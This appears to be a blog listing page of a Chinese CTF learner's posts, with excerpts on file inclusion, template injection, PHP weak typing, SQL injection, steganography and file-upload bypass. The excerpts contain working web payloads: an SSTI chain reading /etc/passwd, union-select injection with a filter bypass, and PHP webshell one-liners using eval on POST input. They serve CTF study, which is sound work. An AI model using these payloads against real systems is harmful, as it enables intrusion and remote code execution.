ctf
pmt123456
这个作者很懒,什么都没留下…
展开
-
文件包含漏洞
本地包含与远程包含本地文件包含漏洞(LFI漏洞)详解php文件包含原理(读取文件源码、图片马、各种协议、远程getshell等)原创 2020-11-30 11:42:23 · 209 阅读 · 0 评论 -
WEB杂七杂八
1、php curl题目:Cat题解:攻防世界-web-Cat(XCTF 4th-WHCTF-2017)key: 1、根据Django的目录,我们使用@进行文件传递,对文件进行读取之后还会把内容传给url参数,如果像上面一样有超出解析范围的编码的时候就会得到错误信息。 2、在报错信息中搜索DATABASE,就可找到数据库的绝对路径。 3、其他:BASE_DIR '/opt/api' ...原创 2020-11-18 10:03:56 · 215 阅读 · 0 评论 -
服务端模板注入攻击 (SSTI)
1、题目:Web_python_template_injection从零学习flask模板注入关于python魔术方法payload:"".__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() 的解释题解1:CTF引出对Python模板注入的思考#找到os模块#有两个#我们要找的是第71个<class 'site._Printer'>num = 0for n in ''.__class__.__m原创 2020-11-17 15:04:40 · 488 阅读 · 0 评论 -
php积累
1、PHP弱类型比较题目simple_php<?phpshow_source(__FILE__);include("config.php");$a=@$_GET['a'];$b=@$_GET['b'];if($a==0 and $a){ echo $flag1;}if(is_numeric($b)){ exit();}if($b>1234){ echo $flag2;}?>php中其中两种比较符号:==:先将字符串类型转化原创 2020-10-22 09:36:16 · 514 阅读 · 0 评论 -
python小积累
Reverse-it#读取文件,逆转,然后保存成图片#注意hex和str的转换#字符串逆转的3种方法https://www.cnblogs.com/fengff/p/10367136.htmlif __name__ == '__main__': filename = "C:/Users/Administrator/Desktop/tmp/0da9641b7aad4efb8f7eb45f47eaebb2" file = open(filename, 'rb') str =原创 2020-10-19 16:42:03 · 173 阅读 · 0 评论 -
Linux命令积累
1、git stash 用法总结和注意点2、原创 2020-10-19 12:56:19 · 84 阅读 · 0 评论 -
Misc-隐写(二)
1、Base64隐写import base64#开始在网上找了一个将int转换为固定位数的二进制的函数,后来参考了别人的用zfill()def int2bin(n, count=24): return "".join([str((n >> y) & 1) for y in range(count-1, -1, -1)])if __name__ == '__main__': b64dict = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcde原创 2020-10-17 11:37:28 · 166 阅读 · 0 评论 -
文件包涵漏洞
https://www.jianshu.com/p/3514f0fd79f7例题:“百度杯”CTF比赛 2017 二月场include注意1.<?php echo system('cat dle345aae.php');?>和2.<?php echo `cat dle345aae.php`;?>的区别原创 2020-10-03 13:14:50 · 114 阅读 · 0 评论 -
sql注入
1.基本步骤https://www.jianshu.com/p/078df7a35671例题:“百度杯”CTF比赛 九月场SQLtips:用<>绕过敏感词过滤1.得到数据库名称为sqlihttp://e14891ee716b434e845d5375b2b206ca6876877f00be47e0.changame.ichunqiu.com/index.php?id=1 union sele<>ct 1,database(),3 2.得到表明为infohtt原创 2020-10-02 16:55:31 · 258 阅读 · 0 评论 -
Misc-隐写
https://www.cnblogs.com/-chenxs/p/11493898.html原创 2020-10-02 09:26:23 · 473 阅读 · 0 评论 -
ctf加密总结
https://blog.csdn.net/qq_40836553/article/details/79383488https://blog.csdn.net/qq_41187256/article/details/79693012?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-3.channel_param&depth_1-utm_source=distribute.pc_rel原创 2020-10-01 21:02:53 · 822 阅读 · 0 评论 -
文件上传绕过总结
总结参考例题:“百度杯”CTF比赛 九月场Upload1.头部<?php 绕过2.文件后缀.php绕过1.php标记的几种风格1.<?phpeval($_POST['cmd']); ?>2.<script language="php"> eval($_POST['cmd']);</script>3.<? eval($_POST['cmd']);?>4.<% eval($_原创 2020-10-01 17:10:36 · 203 阅读 · 0 评论